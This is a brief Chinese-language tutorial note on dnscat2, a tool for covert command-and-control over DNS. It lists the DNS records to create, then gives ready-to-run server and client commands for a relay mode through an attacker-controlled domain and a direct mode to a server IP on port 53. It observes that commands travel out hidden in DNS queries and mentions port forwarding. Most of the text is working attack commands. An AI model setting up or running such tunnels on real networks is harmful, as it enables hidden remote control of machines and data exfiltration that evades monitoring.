中继使用方法
首先创建A记录和NS记录
主机记录 记录类型 记录值
ns A x.x.x.x
dns ns ns.snappyzz.com
这样当我们解析*.dns.snappyzz.com的时候,就会交给ns.snappyzz.com来解析,即x.x.x.x
我们在服务端运行
ruby ./dnscat2.rb dns.snappyzz.com --no-cache
在客户端运行
./dnscat --secret=xxxxxxxxxxxxxxxxxxx dns.snappyzz.com
我们发现命令已经通过dns的域名带出来
直连方法
服务端运行
ruby ./dnscat2.rb
客户端运行
./dnscat --dns server=x.x.x.x,port=53 --secret=6b214ee68c5976465d0fce18db5d3a28
我们可以看到流量已经通过直接连接的方式发送dns协议,通过伪造的域名发送
同样它还有端口转发功能,后续用到了再看